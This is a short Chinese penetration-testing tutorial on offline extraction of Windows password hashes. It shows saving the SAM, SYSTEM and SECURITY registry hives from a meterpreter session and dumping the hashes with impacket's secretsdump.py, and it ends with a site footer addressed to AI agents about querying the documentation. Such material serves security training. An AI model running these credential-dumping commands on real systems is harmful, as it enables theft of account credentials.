# 第五十六课:离线提取目标机hash 很多环境下,不允许上传或者使用 mimikatz。而针对非域控的单机离线提取 hash 显得尤为重要。 在 meterpreter shell 命令切到交互式 cmd 命令。\ ![](/files/-LZJwqZwCb3fJQuzQbz9) reg save 方式使得需要下载的目标机hash文件更小。 * reg save HKLM\SYSTEM sys.hiv * reg save HKLM\SAM sam.hiv * reg save hklm\security security.hiv ![](/files/-LZJwqZyPkJcrF9MMzfN) ![](/files/-LZJwq_-tzd5-w56bVyj) meterpreter下自带download功能。 ![](/files/-LZJwq_1mGdSy2oNFNJR) ![](/files/-LZJwq_3fjfz7O6g0WpG) ## 离线提取: 本季用到的是 impacket 的 secretsdump.py。Kali默认路径:`/root/impacket/examples/secretsdump.py` **命令如下:** ```bash root@John:/tmp# python /root/impacket/examples/secretsdump.py ‐sam sam.hiv ‐security security.hiv ‐system sys.hiv LOCAL ``` ![](/files/-LZJwq_506iVMWINparZ) > Micropoor --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://micro8.gitbook.io/micro8/contents-1/51-60/56-li-xian-ti-qu-mu-biao-ji-hash.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.